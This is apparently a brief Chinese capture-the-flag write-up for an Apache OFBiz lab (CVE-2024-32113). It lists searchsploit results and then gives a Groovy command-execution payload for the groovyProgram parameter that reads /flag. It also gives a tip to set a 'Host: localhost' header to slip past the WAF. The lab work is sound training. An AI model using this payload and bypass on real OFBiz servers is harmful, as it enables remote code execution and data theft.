春秋云境-CVE-2024-32113-Apache_OFBiz

➜  CVE-2024-36104 searchsploit apache ofbiz
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Apache OFBiz - Admin Creator                                                                         | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities                                         | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution)                                                  | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities                                  | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection                                                | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting                                                         | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)                                | java/webapps/48408.txt
Apache OFBiz 18.12.12 - Directory Traversal                                                          | java/webapps/52020.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)                                                | java/webapps/50178.sh
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

没找到RCE的符合版本的漏洞，其实此处的目录遍历漏洞也可以读取flag，但是没有复现成功，在网上找到相关漏洞，后台可处理post上传的groovyProgram参数中的恶意代码。

其中传入的参数为：throw new Exception('cat /flag'.execute().text);

需要注意的是：需要加上Host: localhost的header，不然会被waf拦截报错。